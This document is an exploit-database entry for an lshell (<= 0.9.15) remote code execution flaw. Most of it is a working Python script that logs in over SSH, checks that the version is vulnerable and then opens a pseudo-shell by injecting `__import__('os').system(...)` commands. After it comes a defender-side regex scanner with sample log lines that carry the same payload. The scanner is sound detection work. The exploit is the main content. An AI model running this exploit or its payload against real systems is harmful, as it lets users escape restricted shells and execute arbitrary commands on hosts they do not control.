LShell <= 0.9.15 - Remote Code Execution
Source: @dronesec  Author: drone  Published: 2016-03-31
import paramiko
import sys
import traceback
from time import sleep
 
#
# Exploit lshell pathing vulnerability in <= 0.9.15.
# Runs commands on the remote system.
# @dronesec
#
 
if len(sys.argv) < 4:
    print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
    sys.exit(1)
 
try:
    print '[!] .............................'
    print '[!] lshell <= 0.9.15 remote shell.'
    print '[!] note: you can also ssh in and execute \'/bin/bash\''
    print '[!] .............................'
    print '[!] Checking host %s...'%(sys.argv[3])
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    if len(sys.argv) == 5:
        ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
    else:
        ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
 
 
    # verify lshell
    channel = ssh.invoke_shell()
    while not channel.recv_ready(): sleep(1)
    ret = channel.recv(2048)
 
    channel.send('help help\n')
    while not channel.recv_ready(): sleep(1)
    ret = channel.recv(2048)
 
    if not 'lshell' in ret:
        if 'forbidden' in ret:
            print '[-] Looks like we can\'t execute SSH commands'
        else:
            print '[-] Environment is not lshell'
        sys.exit(1)
 
    # verify vulnerable version
    channel.send('sudo\n')
    while not channel.recv_ready(): sleep(1)
    ret = channel.recv(2048)
    if not 'Traceback' in ret:
        print '[-] lshell version not vulnerable.'
        sys.exit(1)
    channel.close()
    ssh.close()
 
    # exec shell
    print '[+] vulnerable lshell found, preparing pseudo-shell...'
    if len(sys.argv) == 5:
        ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
    else:
        ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
 
    while True:
        cmd = raw_input('$ ')
 
        # breaks paramiko
        if cmd[0] == '/':
            print '[!] Running binaries won\'t work!'
            continue
 
        cmd = cmd.replace("'", r"\'")
        cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
        if len(cmd) > 1:
            if 'quit' in cmd or 'exit' in cmd:
                break
            (stdin,stdout,stderr) = ssh.exec_command(cmd)
        out = stdout.read()
        print out.strip()
except paramiko.AuthenticationException:
    print '[-] Authentication to %s failed.'%sys.argv[3]
except Exception, e:
    print '[-] Error: ', e
    print type(e)
    traceback.print_exc(file=sys.stdout)
finally:
    channel.close()
    ssh.close()
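
Defender-side check, added here as an example (it is not part of the original script): it scans recorded command strings for the `echo __import__('os').system('...')` payload that the script above sends over SSH exec, and decodes the embedded command for triage. The log-line layout and the names `PAYLOAD_RE`, `decode_arg`, `scan` and `SAMPLE` are assumptions made for illustration.

```python
import re

# Shape of the command string the script above passes to exec_command:
#   echo __import__('os').system('<cmd>')
# In <cmd>, every space was replaced by the two characters backslash + t
# and every single quote was backslash-escaped.
PAYLOAD_RE = re.compile(
    r"""__import__\(\s*(['"])os\1\s*\)\s*\.\s*system\(\s*'(?P<arg>(?:\\.|[^'\\])*)'\s*\)"""
)


def decode_arg(arg):
    """Undo the script's encoding for readability: \\t -> space, \\' -> '."""
    return arg.replace(r"\t", " ").replace(r"\'", "'")


def scan(commands):
    """Return (index, decoded_command) for every entry carrying the payload."""
    hits = []
    for i, line in enumerate(commands):
        m = PAYLOAD_RE.search(line)
        if m:
            hits.append((i, decode_arg(m.group("arg"))))
    return hits


# Constructed sample lines; the "user=... cmd=..." layout is hypothetical
# and stands in for whatever command logging the host actually has.
SAMPLE = [
    "user=alice cmd=ls -la",
    "user=bob cmd=echo __import__('os').system('id')",
    "user=bob cmd=echo __import__('os').system('uname\\t-a')",
    "user=carol cmd=echo hello",
    "user=bob cmd=echo __import__('os').system('echo\\t\\'hi\\'')",
]

if __name__ == "__main__":
    for index, decoded in scan(SAMPLE):
        print("line %d: payload decodes to %r" % (index, decoded))
```

A hit on a host running lshell 0.9.15 or earlier means the account's restricted shell should be treated as bypassed.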